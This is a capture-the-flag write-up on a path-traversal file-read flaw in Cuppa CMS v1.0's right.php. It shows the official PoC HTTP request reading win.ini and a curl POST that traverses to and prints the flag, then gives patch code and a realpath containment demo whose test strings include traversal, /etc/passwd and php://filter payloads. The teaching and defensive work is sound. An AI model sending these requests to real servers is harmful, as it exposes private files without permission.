1. Topic
Introduction:
Cuppa CMS v1.0 has an arbitrary file read vulnerability in administrator/templates/default/html/windows/right.php: the file builds an include path from the POST parameter url without restricting it.
Opening the challenge shows a login page.
Neither SQL injection nor brute-forcing the login gets anywhere.
Official PoC
References: the entry in the National Information Security Vulnerability Database (CNNVD) and the CVE description of the vulnerability.
The directory in the official PoC is wrong for this target: it includes administrator/, and that path is not found on the challenge host.
Official PoC request:
POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
Host: 192.168.174.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 272
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.174.133
Referer: http://192.168.174.133/cuppa_cms/administrator/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini
Captured the request in Burp and modified it to match the PoC, but it failed; most likely the path is wrong for this target.
2. Reading the flag file with curl
Browse to templates/default/html/windows/right.php (without the administrator/ prefix).
A blank page here means the file exists; a non-existent file would return 404.
The templates/default/html directory is browsable, and right.php sits in its windows subdirectory.
Source code of right.php:
From Kali, use curl to request the flag file in the filesystem root through the vulnerable include.
curl is a command-line tool for issuing network requests and writing the response to standard output (stdout). It supports many protocols; `curl URL` alone prints the page source, and `-d` sends a POST body.
curl -X POST "http://xxx.ichunqiu.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"
The flag is returned:
flag{fa417734-dac9-4947-831f-67b3ed302120}
Appendix:
Suggested vulnerability fix
In the file '/templates/default/html/windows/right.php', at line 53, add the following check before the include:
$url = $_POST["url"];
// Reject any path that tries to climb out of the templates tree.
if(strstr($url, "../") || strstr($url, "..\\")){
    echo "Security attack!";
    exit;
}
include realpath(__DIR__ . '/../../../..')."/".$url;
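The check above is a blocklist: it only looks for the two literal "../" and "..\" sequences. A more robust approach, shown here as an added example that is not Cuppa CMS code, is to resolve the requested path with realpath() and verify that the result is still inside the base directory. The function name resolve_template_path and the temporary demo directory are assumptions for this illustration; the sample URLs include the PoC traversal from this page.

```php
<?php
// Added example, not from Cuppa CMS: allow only paths that resolve to a
// location underneath $base. The function name is hypothetical.
function resolve_template_path(string $base, string $url): ?string {
    $realBase = realpath($base);
    if ($realBase === false) {
        return null;
    }
    // Refuse null bytes and stream wrappers (php://, data://, http://) outright;
    // realpath() would not catch a wrapper, and include would happily open it.
    if (strpos($url, "\0") !== false || preg_match('#^[a-z][a-z0-9+.\-]*://#i', $url)) {
        return null;
    }
    $candidate = realpath($realBase . DIRECTORY_SEPARATOR . $url);
    if ($candidate === false) {
        return null; // target does not exist (or is unreadable)
    }
    // Containment check: the canonical path must begin with base + separator.
    // realpath() has already collapsed every "..", "." and symlink, so this is
    // a plain prefix comparison rather than a pattern blocklist.
    $prefix = $realBase . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the allowed directory
    }
    return $candidate;
}

// Constructed demo: a temporary base directory with one legitimate template file.
$base = sys_get_temp_dir() . '/cuppa_demo_' . getmypid();
mkdir($base . '/component/table_manager/view', 0700, true);
$legit = $base . '/component/table_manager/view/cu_views.php';
file_put_contents($legit, "<?php echo 'ok';\n");

$tests = [
    'component/table_manager/view/cu_views.php',                // legitimate request
    '../../../../../../../../../../../../flag',                  // the PoC traversal from this page
    'component/../../../../../../../../etc/passwd',              // traversal after a valid segment
    'php://filter/convert.base64-encode/resource=index.php',    // stream wrapper
];
foreach ($tests as $url) {
    $resolved = resolve_template_path($base, $url);
    printf("%-60s => %s\n", $url, $resolved === null ? 'REJECTED' : 'include ' . $resolved);
}

// In right.php the call site would become:
//   $p = resolve_template_path(realpath(__DIR__ . '/../../../..'), $_POST['url']);
//   if ($p === null) { http_response_code(403); exit; }
//   include $p;

// Clean up the constructed demo tree.
unlink($legit);
rmdir($base . '/component/table_manager/view');
rmdir($base . '/component/table_manager');
rmdir($base . '/component');
rmdir($base);
```

Only the first URL resolves; the three others are rejected. Note that even with containment, url= still lets a caller include any PHP file under the CMS root, so the safer long-term fix is an allowlist of the handful of template names right.php is actually meant to render.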